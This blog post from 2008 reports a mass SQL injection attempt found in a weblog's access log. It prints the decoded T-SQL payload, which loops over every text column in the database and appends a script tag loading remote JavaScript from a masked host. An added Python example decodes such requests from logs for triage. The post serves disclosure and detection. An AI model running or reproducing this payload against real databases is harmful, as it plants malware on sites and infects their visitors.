Article 43

 

New SQL Attack

This morning’s weblog had some INTERESTING STUFF:

72.74.129.44 - - /index.php [09/Aug/2008:10:26:34 -0400] “GET /index.php?/weblog/’;DECLARE%20@S%20CHAR(4000);SET%20@S= CAST(0x…

It translates to something like this:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec(’update [’+@T+’] set [’+@C+’]=[’+@C+’]+’’"></title><malicious-script src="http://url-masked/csrss/w.js"> </malicious-script-><!--’’ where ‘+@C+’ not like ‘’%"></title><malicious-script src="http://url-masked/csrss/w.js"></malicious-script><!--’’’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
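To triage requests like the one logged above, this added example (not part of the original post) scans access-log lines for the DECLARE / SET / CAST(0x...) shape and decodes the hex literal into readable SQL without executing it. The log lines, IP addresses and stand-in payload are constructed; the handling of NVARCHAR (UTF-16LE) blobs goes beyond the CHAR(4000) case shown in the post.

```python
import re
from urllib.parse import unquote

# Shape of the request logged above: DECLARE @S CHAR(n);SET @S=CAST(0x<hex>...
CAST_HEX = re.compile(
    r"DECLARE\s+@\w+\s+N?(?:VAR)?CHAR\(\d+\)\s*;\s*SET\s+@\w+\s*=\s*CAST\(\s*0x([0-9a-f]+)",
    re.IGNORECASE,
)

def decode_blob(hex_str):
    """Turn the hex literal into text for triage. The result is only read, never run."""
    if len(hex_str) % 2:              # log line was cut mid-byte: drop the dangling nibble
        hex_str = hex_str[:-1]
    raw = bytes.fromhex(hex_str)
    # NVARCHAR payloads are UTF-16LE: for ASCII text every second byte is 0x00.
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")

def scan(lines):
    """Return (line_no, client_ip, decoded_sql) for each request matching the pattern."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        match = CAST_HEX.search(unquote(line))   # undo %20 etc. before matching
        if match:
            hits.append((line_no, line.split(" ", 1)[0], decode_blob(match.group(1))))
    return hits

# Constructed sample log (documentation IPs, harmless stand-in payload).
STAND_IN = "SELECT 1 -- constructed stand-in"
SAMPLE_LOG = [
    '203.0.113.7 - - /index.php [09/Aug/2008:10:26:34 -0400] "GET /index.php?/weblog/\';'
    "DECLARE%20@S%20CHAR(4000);SET%20@S= CAST(0x" + STAND_IN.encode("ascii").hex().upper()
    + '%20AS%20CHAR(4000)) HTTP/1.1" 200 512',
    '203.0.113.9 - - /index.php [09/Aug/2008:10:27:01 -0400] "GET /index.php?/weblog/ HTTP/1.1" 200 2048',
    '198.51.100.4 - - /index.php [09/Aug/2008:10:29:40 -0400] "GET /index.php?id=1;'
    "DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + STAND_IN.encode("utf-16-le").hex()
    + '%20AS%20NVARCHAR(4000)) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, client, sql in scan(SAMPLE_LOG):
        print(f"line {line_no}: {client} sent encoded SQL: {sql!r}")
```

A hit in the log shows only that the request arrived; whether any table was changed has to be checked in the database itself.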

Looks like some poor VERIZON CUSTOMER’S COMPUTER may be OWN3D.

ANY OF US with unpatched or poorly maintained systems can easily fall victim too, and do the dirty work for those out to steal our data.

Verizon’s security team was alerted.

Posted by Elvis on 08/09/08